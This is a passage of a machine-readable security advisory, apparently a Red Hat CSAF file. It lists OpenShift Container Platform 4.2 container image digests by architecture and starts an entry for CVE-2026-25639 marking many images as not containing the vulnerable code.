"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
